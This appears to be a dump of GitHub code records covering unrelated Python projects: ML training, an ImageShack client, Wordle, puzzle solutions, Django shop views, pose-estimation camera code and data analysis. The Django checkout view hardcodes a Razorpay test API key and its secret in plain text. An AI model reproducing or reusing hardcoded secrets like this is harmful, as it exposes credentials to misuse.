= utils.Config(\n args.model,\n savepath=(args.savepath, 'model_config.pkl'),\n horizon=args.horizon,\n transition_dim=observation_dim + action_dim,\n cond_dim=observation_dim,\n dim_mults=args.dim_mults,\n device=args.device,\n )\n\ndiffusion_config = utils.Config(\n args.diffusion,\n savepath=(args.savepath, 'diffusion_config.pkl'),\n horizon=args.horizon,\n observation_dim=observation_dim,\n action_dim=action_dim,\n n_timesteps=args.n_diffusion_steps,\n loss_type=args.loss_type,\n device=args.device,\n)\n\ntrainer_config = utils.Config(\n utils.Trainer,\n savepath=(args.savepath, 'trainer_config.pkl'),\n train_batch_size=args.batch_size,\n train_lr=args.learning_rate,\n gradient_accumulate_every=args.gradient_accumulate_every,\n ema_decay=args.ema_decay,\n sample_freq=args.sample_freq,\n save_freq=args.save_freq,\n label_freq=int(args.n_train_steps // args.n_saves),\n save_parallel=args.save_parallel,\n results_folder=args.savepath,\n bucket=args.bucket,\n n_reference=args.n_reference,\n)\n\n#-----------------------------------------------------------------------------#\n#-------------------------------- instantiate --------------------------------#\n#-----------------------------------------------------------------------------#\n\nif \"decouple\" in args.config:\n dynamic_model = dynamic_model_config()\n policy_model = policy_model_config()\n diffusion = diffusion_config(policy_model, dynamic_model)\nelse:\n model = model_config()\n diffusion = diffusion_config(model)\n\ntrainer = trainer_config(diffusion, dataset, renderer)\n\n#-----------------------------------------------------------------------------#\n#------------------------ test forward & backward pass -----------------------#\n#-----------------------------------------------------------------------------#\n\nprint('Testing forward...', end=' ', flush=True)\nbatch = utils.batchify(dataset[0])\n\nloss, _ = diffusion.loss(*batch)\nloss.backward()\nprint('✓')\n\n#-----------------------------------------------------------------------------#\n#--------------------------------- main loop ---------------------------------#\n#-----------------------------------------------------------------------------#\n\nn_epochs = int(args.n_train_steps // args.n_steps_per_epoch)\n\nfor i in range(n_epochs):\n print(f'Epoch {i} / {n_epochs} | {args.savepath}')\n trainer.train(n_train_steps=args.n_steps_per_epoch)\n","repo_name":"qianlin04/Safe-offline-RL-with-diffusion-model","sub_path":"scripts/train_cost_values.py","file_name":"train_cost_values.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"42789692170","text":"import os, sys\nimport datetime\nimport glob\nfrom pprint import pprint\nimport re\n\nimport requests\n\nfrom creds import *\n\nBASE_URL = \"https://api.imageshack.com/v2/\"\n\nclass ImageShackError(Exception):\n def __init__(self, response):\n self.response = response\n\nclass ImageShackConnectionError(Exception): pass\n\nclass ImageShack:\n\n def __init__(self, username=USERNAME, auth_token=AUTH_TOKEN, api_key=API_KEY):\n self.username = username\n self.auth_token = auth_token\n self.api_key = api_key\n self.base_url = BASE_URL\n\n def get(self, relative_url, **kwargs):\n url = self.base_url + relative_url\n params = {\"api_key\" : self.api_key, \"auth_token\" : self.auth_token} ##, \"public\" : False}\n params.update(kwargs)\n try:\n response = requests.get(url, params=params)\n except requests.exceptions.ConnectionError:\n 
raise ImageShackConnectionError()\n if not response.json()['success']:\n raise ImageShackError(response)\n return response\n\n def post(self, relative_url, **kwargs):\n url = self.base_url + relative_url\n params = {\"auth_token\" : self.auth_token, \"api_key\" : self.api_key}\n files = dict((\"File %s\" % i, f) for (i, f) in enumerate(kwargs.pop(\"files\", []), 1))\n params.update(kwargs)\n try:\n response = requests.post(url, data=params, files=files)\n except requests.exceptions.ConnectionError:\n raise ImageShackConnectionError()\n if not response.json()['success']:\n raise ImageShackError(response)\n return response\n\n def create_album(self, album_name):\n return self.post(\"albums\", title=album_name)\n\n def upload(self, filepath, name, album_name, tags):\n with open(filepath, \"rb\") as f:\n return self.post(\n \"images\",\n files=[f],\n album=album_name,\n title=name,\n tags=\",\".join(tags),\n public=False\n )\n\n def image(self, image_id):\n response = self.get(\"images/%s\" % image_id)\n info = response.json()['result']\n image_url = \"http://\" + info['direct_link']\n filename = info['original_filename']\n image_response = requests.get(image_url)\n image_response.raise_for_status()\n info['image_bytes'] = bytes(image_response.content)\n return info\n\nclass ImageShackUser(ImageShack):\n\n def __init__(self, username=USERNAME, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.username = username\n self.base_url += \"/user/\" + self.username + \"/\"\n\n def albums(self):\n response = self.get(\"albums\", show_private=True)\n albums = response.json()['result']['albums']\n return dict((a['id'], a['title']) for a in albums)\n\n def tags(self):\n response = self.get(\"tags\", limit=1000000, offset=0, image_limit=50)\n tags = response.json()['result']['tags']\n tag_info = {}\n for tag, info in tags.items():\n images = info['images']\n tag_info[tag] = [image['id'] for image in images]\n return tag_info\n\n def tag_images(self, tag_name):\n response = self.get(\"tags/%s\" % tag_name, limit=1000000, offset=0)\n return response.json()['result']\n\nif __name__ == '__main__':\n #\n # By way of a sanity check, attempt to connect to ImageShack\n #\n shack = ImageShack()\n print(\"Connected to %s with username %s\" % (shack.base_url, shack.username))\n","repo_name":"tjguk/imageshack-uploader","sub_path":"imageshack.py","file_name":"imageshack.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20426038226","text":"from random import choice\nfrom colorama import Back, Style, Fore, init\n\n# Resets my color/styles at the end of their respective lines\ninit(autoreset=True)\n\n# Imports Mac built-in word list, filters to get only 5 letter words, then 'choice' chooses a random 5 letter word\nword_list = [line.strip() for line in open(\"/usr/share/dict/words\")]\nfiltered_list = choice(list(filter(lambda x: len(x) == 5, word_list)))\n\n# Method to get the word from the user, checks to make sure it's a string and only 5 letters long, returns it as an uppercase word using '.upper'\ndef user_guess():\n while True:\n player_guess = input(\"Enter a 5 letter word! 
\")\n if type(player_guess) != str or len(player_guess) != 5:\n print(\"Invalid word, try again!\")\n continue\n else:\n return player_guess.upper()\n\n\n# -----START OF GAME-----will be brought here at file open and also at end of each game\nplay = True\nwhile play == True:\n print()\n print(\n \"\"\"\n|-------------A Long Time Ago In a Terminal Far Far Away-------------------\n| ____ __ ____ ______ .______ _______ __ _______ |\n| \\ \\ / \\ / / / __ \\ | _ \\ | \\ | | | ____| |\n| \\ \\/ \\/ / | | | | | |_) | | .--. || | | |__ |\n| \\ / | | | | | / | | | || | | __| |\n| \\ /\\ / | `--' | | |\\ \\----.| '--' || `----.| |____ |\n| \\__/ \\__/ \\______/ | _| `._____||_______/ |_______||_______| |\n|_________________________________________________________________________|\n\"\"\"\n )\n print(\n Back.WHITE\n + Fore.BLUE\n + \" Hello there! Would you like to start a new game? Enter 'Yes' or 'Quit' \"\n )\n print()\n response = input().upper()\n print()\n if response == \"QUIT\":\n Play = False\n break\n elif response == \"YES\":\n print(Fore.BLUE + \"Great! May the Force be with you.\")\n print()\n\n # -----SET UP FOR MAIN LOOP-----\n guesses = 0\n output = [ # Create list to throw letters as strings into each index\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n ]\n previous_guesses = []\n\n # -----MAIN LOOP-----\n while guesses < 6:\n print()\n print(\n \"You have\", 6 - guesses, \"guesses left.\"\n ) # My guesses count up, so to show number of guesses remaining I had to subtract from 6\n guess = user_guess() # Function defined above\n print()\n word = (\n filtered_list.upper()\n ) # Bring in my random word from above and set it to 'word'\n guess_list = list(guess) # ex. ['G', 'U', 'E', 'S', 'S']\n random_word = list(\n word\n ) # ex. ['H', 'E', 'L', 'L', 'O'] split my words into a strings\n guesses = guesses + 1 # For each *valid* guess increase 'guesses' by 1\n for i in range(len(random_word)): # Loops through every index of the list\n if (\n guess_list[i] == random_word[i]\n ): # If a letter of my guess word is in the correct spot of the word\n output[i] = (\n Fore.WHITE + Back.GREEN + guess_list[i] + Style.RESET_ALL\n )\n elif (\n guess_list[i] in random_word\n ): # If a letter of my guess word is in the word but not correct spot\n output[i] = (\n Fore.WHITE + Back.YELLOW + guess_list[i] + Style.RESET_ALL\n )\n else: # If a letter of my guess word is not in the word at all\n output[i] = Fore.WHITE + Back.RED + guess_list[i] + Style.RESET_ALL\n if guess_list == random_word:\n print(\n Back.WHITE\n + Fore.BLUE\n + \"The force is strong with you! The word was\",\n Fore.WHITE + Back.BLUE + \"\".join(output),\n )\n else:\n string_output = \"\".join(\n output\n ) # Join the output back together into a string\n previous_guesses.append(\n string_output\n ) # Add the output into previous guesses list\n print(\n \"\\n\".join(previous_guesses)\n ) # display output, drops each guess/output down a line so they are stacked\n print()\n random_word_string = \"\".join(random_word) #\n print(\n Back.WHITE\n + Fore.BLUE\n + \"Ouch! You lose! Try harder next time. 
The word was\",\n Fore.WHITE + Back.BLUE + random_word_string,\n )\n","repo_name":"alecdhansen/python_wordle","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"9379873269","text":"import functools\n\ndef compare(l1: list[list|int], l2: list[list|int])->int:\n for i in range(len(l1)):\n if len(l2) <= i:\n return -1\n if type(l1[i]) == type(l2[i]):\n if type(l1[i]) == int:\n if l1[i] > l2[i]:\n return -1\n elif l2[i] > l1[i]:\n return 1\n else:\n r = compare(l1[i], l2[i])\n if r != 0:\n return r\n else:\n if type(l1[i]) == int:\n r = compare([l1[i]], l2[i])\n if r != 0:\n return r\n elif type(l2[i]) == int:\n r = compare(l1[i], [l2[i]])\n if r != 0:\n return r\n if len(l1) < len(l2):\n return 1\n return 0\n\n\nf = open(\"input.txt\", \"r\")\n\nr = 0\n\nsep1 = [[2]]\nsep2 = [[6]]\npackets = [sep1, sep2]\n\nlines = f.read().strip().splitlines()\n\nfor line in lines:\n line = line.strip()\n if line == \"\":\n continue\n \n packets.append(eval(line))\n\npackets.sort(key=functools.cmp_to_key(compare), reverse=True)\n\nr = packets.index(sep1)+1\nr *= packets.index(sep2)+1\n\nprint(r)","repo_name":"MrTip0/AdventOfCode2022","sub_path":"d13p2.py","file_name":"d13p2.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"71373271613","text":"foods = [\r\n\"orange\",\r\n\"apple\",\r\n\"banana\",\r\n\"strawberry\",\r\n\"grape\",\r\n\"blueberry\",\r\n\"carrot\", \r\n\"cauliflower\", \r\n\"pumpkin\",\r\n\"passionfruit\",\r\n\"mango\",\r\n\"kiwifruit\"\r\n]\r\n# QUESTION 1 \r\nprint(foods)\r\n\r\n# orange\r\nprint(foods[0])\r\n\r\n#banana\r\nprint(foods[2])\r\n\r\n#kiwi\r\nprint(foods [11])\r\n\r\n# Q4\r\nprint(foods[0:3])\r\n\r\n#Q5\r\nprint(foods[9:12])\r\n\r\nfoods2 = [\r\n\"orange\",\r\n\"apple\",\r\n\"banana\",\r\n\"strawberry\",\r\n\"grape\",\r\n\"blueberry\",\r\n[\"carrot\", \"cauliflower\", \"pumpkin\"],\r\n\"passionfruit\",\r\n\"mango\",\r\n\"kiwifruit\"\r\n]\r\n\r\nprint(foods2 [6][2])\r\n\r\n# QUESTION 2 \r\n\r\nmailing_list = [\r\n[\"Roary\", \"roary@moth.catchers\"],\r\n[\"Remus\", \"remus@kapers.dog\"],\r\n[\"Prince Thomas of Whitepaw\", \"hrh.thomas@royalty.wp\"],\r\n[\"Biscuit\", \"biscuit@whippies.park\"],\r\n[\"Rory\", \"rory@whippies.park\"],\r\n]\r\n\r\nfor item in mailing_list:\r\n print(f'{item[0]}:' f'{item[1]}')\r\n\r\n# QUESTION 3\r\n\r\nnames = [] # creates empty list called names\r\ndoneEntering = False\r\nwhile (not doneEntering):\r\n name = input(\"Enter a name:\")\r\n name = name.strip()\r\n if (name == \"\"):\r\n doneEntering = True\r\n else:\r\n names.append(name)\r\nprint(names)","repo_name":"imogeneweatherly/SheCodes_Lists_and_Loops","sub_path":"SheCodesHW_Lists.py","file_name":"SheCodesHW_Lists.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"16759202320","text":"\"\"\" Component 1 - Get user details v2 - based on v1\nForce user to enter an integer when inputting an age\n\"\"\"\n\nuser_name = input(\"What is your name? \")\nerror = \"Please enter a valid integer.\"\nvalid = False\n\nwhile not valid:\n try:\n user_age = int(input(\"How old are you? \"))\n\n print(f\"Your name is {user_name} and you are {user_age} years old!\")\n valid = True\n\n except ValueError:\n print(error)\n","repo_name":"carter-123/11DTC-Assessment-Maori-Quiz","sub_path":"C1_user_details_v2.py","file_name":"C1_user_details_v2.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"9179441506","text":"from django.shortcuts import render, get_object_or_404, HttpResponse, redirect\n\nfrom django.views import View\nfrom Products.models import ShowProducts\nimport razorpay\nfrom ShoppingCart.models import Order\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom Products.middlewares.auth import auth_middleware\n\n# Create your views here.\n\nclass Homepage(View):\n\n def get(self, request):\n laptops = ShowProducts.objects.all()\n context = {\n \"laptops\": laptops,\n }\n print(request.session.get(\"customer\"))\n return render(request, \"productsHomepage.html\", context)\n \n \n def post(self, request):\n gettingProduct = request.POST.get(\"laptop\")\n request.session[\"laptopProduct\"] = gettingProduct\n print(request.session.get(\"laptopProduct\"))\n return redirect(\"checkoutPage\")\n\n\nclass WomenProductPage(View):\n\n def get(self, request):\n cart = request.session.get(\"cart\")\n if not cart:\n request.session[\"cart\"] = {}\n productsInfo = list(ShowProducts.objects.all())\n context = {\"womenproducts\": productsInfo}\n return render(request, \"womenProducts.html\", context)\n\n def post(self, request):\n product = request.POST.get(\"product\")\n remove = request.POST.get(\"remove\")\n cart = request.session.get(\"cart\")\n if cart:\n quantity = cart.get(product)\n if quantity:\n if remove:\n if quantity<=1:\n cart.pop(product)\n else:\n cart[product] = quantity-1\n else:\n cart[product] = quantity+1\n else:\n cart[product] = 1\n else:\n cart = {}\n cart[product] = 1\n\n request.session[\"cart\"] = cart\n print(request.session[\"cart\"])\n\n return redirect(\"womensProductPage\")\n\n\n\nclass ProductsDetailPage(View):\n\n def get(self, request, id):\n obj = get_object_or_404(ShowProducts, pk=id)\n context = {\"obj\": obj}\n return render(request, \"productDetailPage.html\", context)\n \n def post(self, request, id):\n product = request.POST.get(\"product\")\n remove = request.POST.get(\"remove\")\n cart = request.session.get(\"cart\")\n if cart:\n quantity = cart.get(product)\n if quantity:\n if remove:\n if quantity<=1:\n cart.pop(product)\n else:\n cart[product] = quantity-1\n else:\n cart[product] = quantity+1\n else:\n cart[product] = 1\n else:\n cart = {}\n cart[product] = 1\n\n request.session[\"cart\"] = cart\n print(request.session[\"cart\"])\n\n return redirect(\"/women/\"+str(id))\n\nclass CheckoutPage(View):\n @method_decorator(auth_middleware)\n def get(self, request):\n sessionGettingProduct = request.session.get(\"laptopProduct\")\n productById = ShowProducts.get_products_by_id(sessionGettingProduct)\n context = {\n \"productCheckout\": productById,\n }\n return render(request, \"checkout.html\", context)\n \n def post(self, request):\n \n # Razorpay Implementation\n productAmt = request.POST.get(\"totalAmt\")\n order_amount = productAmt\n order_currency = 'INR'\n order_receipt = 'order_rcptid_11'\n \n client = razorpay.Client(auth=(\"rzp_test_G1jXAHHxcitb1c\", \"OBWdRbrbITmt08F3aQQkF7L3\"))\n payment = client.order.create({\"amount\":order_amount, \"currency\":order_currency, \"receipt\":order_receipt})\n print(payment)\n \n return HttpResponse(\"Thankyou\")","repo_name":"aashishparyaniba/HerokuDeployment","sub_path":"Products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"12773612241","text":"# Unpack Canvas HW for grading.\n# Bart Massey 2023\n\nimport argparse, re, json, subprocess, sys, zipfile\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser(\n prog='unpack-hw',\n description='Unpack a student homework archive for grading',\n)\nparser.add_argument(\"--hw\", required=True)\nparser.add_argument(\"filename\")\nargs = parser.parse_args()\n\ndef mkfdir(root):\n fdest = Path(root)\n if fdest.is_dir():\n print(f\"directory {root} exists\", file=sys.stderr)\n exit(1)\n fdest.mkdir(mode=0o700)\n return fdest\n\nsdest = mkfdir(\"staged\")\ngdest = mkfdir(\"graded\")\n\nstudent_names = dict()\nwith open(\"students.json\", \"r\") as s:\n s = json.load(s)\n for record in s:\n student_id = str(record[\"id\"])\n student_names[student_id] = record[\"short_name\"]\n\nfilename_re = re.compile(r\"([a-z]+)_(LATE_)?([0-9]+)_([0-9]+).*$\")\nproject_archive = zipfile.ZipFile(args.filename)\nprojects = []\nfor zipinfo in project_archive.infolist():\n fields = filename_re.search(zipinfo.filename)\n if fields is None:\n print(f\"warning: filename not parsed: {zipinfo.filename}\", file=sys.stderr)\n continue\n slug, student_id, asg_id = fields[1], fields[3], fields[4]\n name = student_names[student_id]\n\n path = mkfdir(sdest / slug)\n\n zip = project_archive.open(zipinfo)\n with zipfile.ZipFile(zip) as zip:\n zip.extractall(path=path)\n\n grading = path / \"GRADING.txt\"\n with open(grading, \"w\") as gr:\n print(args.hw, file=gr)\n print(name, file=gr)\n print(\"-\", file=gr)\n print(file=gr)\n\n info = path / \".canvas_info\"\n with open(info, \"w\") as i:\n print(f\"{student_id},{asg_id}\", file=i)\n","repo_name":"BartMassey/canvas-hw","sub_path":"unpack-hw.py","file_name":"unpack-hw.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"16303225866","text":"def solution(A):\r\n A=sorted(A)\r\n max1=A[-1]*A[-2]*A[-3] # product of the three largest values\r\n if A[0]<0 and A[1]<0:\r\n # two most-negative values times the largest value can beat max1\r\n max2 = A[0]*A[1]*A[-1]\r\n if max2>max1:\r\n return max2\r\n else:\r\n return max1\r\n else:\r\n return max1","repo_name":"firdausis/codility","sub_path":"max_product_of_three.py","file_name":"max_product_of_three.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"20166883693","text":"import torch\n\nfrom mmpose.core.camera import CAMERAS\nfrom mmpose.core.camera import SimpleCameraTorch\nfrom .utils import undistortPoints_torch\n\n\n@CAMERAS.register_module()\nclass CustomSimpleCameraTorch(SimpleCameraTorch):\n def __init__(self, param, device):\n super(CustomSimpleCameraTorch, self).__init__(param, device)\n self.device = device\n\n def pixel_to_camera(self, X, left_product=False):\n assert isinstance(X, torch.Tensor)\n assert X.ndim >= 2 and X.shape[-1] == 2\n X = X.float()\n camera_matrix = torch.eye(3, device=self.device)\n camera_matrix[:2] = self.param['K'].T\n _X = X.new_ones(X.shape[0], 3)\n _X[:, :2] = self.undistort(X)\n\n _X = torch.inverse(camera_matrix) @ _X.T\n\n if left_product:\n return _X\n else:\n return _X.T\n\n def undistort(self, X):\n if self.undistortion:\n camera_matrix = torch.eye(3, device=self.device)\n camera_matrix[:2] = self.param['K'].T\n uv = X.view(1, -1, 2)\n k = self.param['k']\n p = self.param['p']\n dist = X.new_zeros(1, 5)\n # dist = np.array([[k[0], k[1], p[0], p[1], k[2]]], dtype=np.float32)\n dist[0, :2] = k[:2]\n dist[0, 2:4] = p[:2]\n dist[0, 4] = k[2]\n uv = undistortPoints_torch(uv,\n camera_matrix[None],\n dist, camera_matrix[None])[0]\n return uv\n else:\n return X\n\n def camera_to_ray(self, X, left_product=False):\n assert isinstance(X, torch.Tensor)\n assert X.ndim >= 2\n assert X.shape[0] == 3 or X.shape[-1] == 3\n if X.shape[0] == 3:\n X = X.T\n\n _X = X / (X[:, 2:] + 1e-12)\n camera_center = self.param['T_c2w'] # 1x3\n ray_direction = _X @ self.param['R_c2w'] # Nx3\n\n if left_product:\n return camera_center.T, ray_direction.T\n else:\n return camera_center, ray_direction\n","repo_name":"wusize/multiview_pose","sub_path":"multiview_pose/core/camera/single_camera_torch.py","file_name":"single_camera_torch.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"78"}
+{"seq_id":"33527868773","text":"import sys\n\nsys_input = sys.stdin.readline\n\n\ndef solution():\n str1 = sys_input().rstrip()\n str2 = sys_input().rstrip()\n str1_len = len(str1)\n str2_len = len(str2)\n dt = [[\"\" for _s1 in range(str1_len + 1)] for _s2 in range(str2_len + 1)]\n\n for s2_idx in range(str2_len):\n for s1_idx in range(str1_len):\n if str1[s1_idx] == str2[s2_idx]:\n dt[s2_idx + 1][s1_idx + 1] = dt[s2_idx][s1_idx] + str1[s1_idx]\n else:\n dt[s2_idx + 1][s1_idx + 1] = max(dt[s2_idx][s1_idx + 1], dt[s2_idx + 1][s1_idx], key=len)\n\n result = dt[str2_len][str1_len]\n if len(result) == 0:\n print(0)\n else:\n print(len(result))\n print(result)\n\n\nsolution()\n","repo_name":"nakevin96/AlgorithmPracPython","sub_path":"2022_09/baekjoon/2022_09_16_baekjoon_9252_yoon.py","file_name":"2022_09_16_baekjoon_9252_yoon.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"32443454579","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nmatplotlib.use('PS')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LinearRegression, Ridge\nfrom sklearn import metrics\nimport environment, dataset\nfrom dataset import Dataset\nfrom features import FeatureGenerator\n\n# captures analysis of the dataset\n# can be passed through Dataset object to preprocess\nclass DataAnalysis(object):\n def __init__(self, cols, outpath=\"output/\"):\n self.outpath = outpath\n self.cols = cols\n self.ind = ['id', 'timestamp', 'y']\n self.data_obj = Dataset()\n self.df = self.data_obj.fullset\n\n def analyze_nan(self, df_norm=None):\n # check % of NaN per feature, return dataframe containing % of NaN per feature\n # useful to look at which features to choose from\n if df_norm is None:\n df = self.df.drop(columns=self.ind)\n else:\n df = df_norm.drop(columns=self.ind) \n null_counts = df.isnull().sum()/len(df)\n null_counts = null_counts.sort_values()\n null_counts = pd.DataFrame({'Features':null_counts.index, '% Missing NaN':null_counts.values})\n null_counts.set_index('Features',inplace=True)\n plt.figure(figsize=(20,10))\n plt.xticks(np.arange(len(null_counts)),null_counts.index,rotation='vertical')\n plt.ylabel('Percentage of rows with NaN')\n plt.bar(np.arange(len(null_counts)),null_counts['% Missing NaN'])\n plt.tight_layout()\n plt.savefig(self.outpath+'missing_nan.png')\n return null_counts\n \n def analyze_corr_with_score(self):\n df = self.data_obj.preprocess(fill_method='median', scale_method='none')\n features_obj = FeatureGenerator(self.data_obj)\n train = features_obj.train\n corr_with_y = train[features_obj.features].corrwith(train.y).abs().sort_values(ascending=False).to_frame(name='corr')\n corr_with_y.index.name = 'features'\n corr_with_y.reset_index(level=0, inplace=True)\n corr_with_y['rank_corr'] = corr_with_y['corr'].rank()\n reward_df = pd.read_csv(self.outpath+'_Ridge_Reward.csv')\n reward_df['rank_reward'] = reward_df['reward'].rank()\n rank_df = pd.merge(corr_with_y, reward_df, on='features')\n top_rank_df = rank_df[(abs(rank_df['rank_corr']-rank_df['rank_reward']) < 30) & (rank_df['rank_reward'] > 0)]\n top_rank_df.to_csv(self.outpath+'_Top_Ridge_Corr_Reward_Rank.csv')\n\n # overfitting data using Ridge\n def analyze_selected_features(self):\n df = self.data_obj.preprocess(fill_method='median', scale_method='none')\n features_obj = FeatureGenerator(self.data_obj)\n train = features_obj.train\n filtered_features = features_obj.filter_features()\n top_features = filtered_features[:10]\n top_features = features_obj.features\n track_score = {}\n for feature in top_features:\n model = Ridge(fit_intercept=False, normalize=True)\n model.fit(np.array(train[feature].values).reshape(-1,1), train.y.values)\n rewards = {} \n env = environment.make(df)\n observation = env.reset()\n\n while True:\n test_x = np.array(observation.features[feature].values).reshape(-1,1)\n observation.target.y = model.predict(test_x)\n target = observation.target\n timestamp = observation.features[\"timestamp\"][0]\n if timestamp % 100 == 0:\n print(\"Timestamp #{}\".format(timestamp))\n\n observation, reward, done, info = env.step(target)\n #rewards[timestamp] = reward\n if done:\n \"\"\"\n rewards_df = pd.DataFrame.from_dict(rewards, orient='index')\n rewards_df.plot(kind='line', color='#0b3fe8', legend=None, figsize=(16,8))\n plt.xlabel('Timestamps')\n plt.ylabel('Rewards')\n plt.title('Ridge Regression Using '+feature+' [60 percent of Training + 40 percent for Testing]')\n plt.savefig(self.outpath+feature+'_lm_rewards.png')\n \"\"\"\n track_score[feature] = info['public_score']\n print(feature, track_score[feature])\n break\n rewards_df = pd.DataFrame.from_dict(track_score, orient='index', columns=['features','reward']).sort_values(by='reward', ascending=False)\n rewards_df.to_csv(self.outpath+'_Ridge_Reward.csv')\n print(rewards_df)\n\n def analyze_corr(self, df_norm=None):\n if df_norm is None:\n df, y = self.df.drop(columns=self.ind), self.df['y']\n df_features = self.df.drop(columns=self.ind + ['y'])\n else:\n df, y = df_norm.drop(columns=self.ind), df_norm['y']\n df_features = df_norm.drop(columns=self.ind + ['y'])\n\n corr = df_features.corr()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(corr, cmap='coolwarm', vmin=-1, vmax=1)\n fig.colorbar(cax)\n ticks = np.arange(0,len(df_features.columns),1)\n ax.set_xticks(ticks)\n plt.xticks(rotation=90)\n ax.set_yticks(ticks)\n ax.set_xticklabels(df_features.columns)\n ax.set_yticklabels(df_features.columns)\n plt.savefig(self.outpath+'features_corr.png')\n\n corr = corr.abs()\n upper = corr.where(np.triu(np.ones(corr.shape), k=1).astype(np.bool))\n high_corr = [column for column in upper.columns if any(upper[column] >= 0.90)]\n return df.corrwith(y).sort_values(ascending=False)\n\n def analyze_outliers(self):\n train = environment.make().train\n y = train['y'].values\n fig = plt.figure(figsize=(12, 6))\n plt.hist(y, bins=70, color='#0b3fe8')\n plt.xlabel('Returns')\n plt.ylabel('Count')\n plt.title('Empirical Return Distribution of The Output Value Y [VIX-Related Product]')\n plt.savefig(self.outpath+'y_distribution.png')\n plt.clf()\n\n fig = plt.figure(figsize=(12, 6))\n plt.xlabel('Timestamps')\n plt.title('Output Value of Y and Timestamp')\n train = environment.make().fullset\n plt.plot(list(train['timestamp'].unique()), train.groupby('timestamp')['y'].mean(), c='blue', label='y')\n plt.plot(list(train['timestamp'].unique()), train.groupby('timestamp')['y'].std(), c='red', label='std(y)')\n plt.xlim(list(train['timestamp'].unique())[0], list(train['timestamp'].unique())[-1])\n plt.legend(framealpha=1, frameon=True)\n plt.savefig(self.outpath+'y_return_comparison.png')\n plt.clf()\n\n \"\"\"\n time_targets = train.groupby('timestamp')['y'].mean()\n plt.figure(figsize=(12, 5))\n plt.plot(time_targets)\n plt.xlabel('Timestamps')\n plt.ylabel('Mean of target')\n plt.title('Change in target over time - Red lines = new timeperiod')\n for i in timediff[timediff > 5].index:\n plt.axvline(x=i, linewidth=0.25, color='red')\n \"\"\"\n\n def security_regression(self):\n train_data, test_data = self.env.train[self.cols+self.ind], self.env.test[self.cols+self.ind]\n train_data = train_data.fillna(train_data[self.cols].dropna().median())\n test_data = test_data.fillna(test_data[self.cols].dropna().median())\n unique_id = np.unique(train_data['id'] )\n unique_id_len = len(unique_id)\n\n # fit linear regression to train on y for each security id\n security_id, mae, mse, rmse = [], [], [], []\n for i in range(unique_id_len): \n train_id = train_data[train_data['id']==unique_id[i]]\n test_id = test_data[test_data['id']==unique_id[i]]\n\n # in case test data does not contain the security id\n if len(test_id) <= 1:\n continue\n model = LinearRegression().fit(train_id[self.cols],train_id['y'])\n y_pred = model.predict(test_id[self.cols])\n security_id.append(unique_id[i])\n mae.append(metrics.mean_absolute_error(test_id['y'], y_pred))\n mse.append(metrics.mean_squared_error(test_id['y'], y_pred)) \n rmse.append(np.sqrt(metrics.mean_squared_error(test_id['y'], y_pred)))\n output = pd.DataFrame(list(zip(security_id, mae, mse, rmse)), columns=['id','mae','mse','rmse'])\n output = output.sort_values('mse',ascending=True)\n \"\"\"\n lr_model = list(train_data.groupby('id').apply(lambda df: LinearRegression().fit(df[cols], df['y'])))\n for model in lr_model:\n y_pred = model.predict(test_data[cols])\n print('Mean Absolute Error:', metrics.mean_absolute_error(test_data['y'], y_pred)) \n print('Mean Squared Error:', metrics.mean_squared_error(test_data['y'], y_pred)) \n print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(test_data['y'], y_pred)))\n \"\"\"\n return output\n\n\nif __name__ == \"__main__\":\n cols = ['technical_20', 'technical_30', 'technical_29', 'technical_40']\n data_analysis = DataAnalysis(cols)\n data_analysis.analyze_outliers()\n data_analysis.analyze_corr_with_score()\n data_analysis.analyze_selected_features()\n # unprocessed data\n #print(data_analysis.analyze_corr().head(6))\n #print(data_analysis.analyze_corr().tail(6))\n #top_nan_features = data_analysis.analyze_nan()\n #print(data_analysis.df.describe())\n\n # preprocessed data\n data_obj = dataset.create()\n df = data_obj.preprocess()\n data_analysis.analyze_corr(df)\n #print(data_analysis.analyze_corr(df).head(6))\n #print(data_analysis.analyze_corr(df).tail(6))\n features_obj = FeatureGenerator(data_obj)\n clusters = features_obj.cluster_corr()\n print(clusters)\n","repo_name":"NumberChiffre/SparkMLFactorInvesting","sub_path":"code/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":9838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
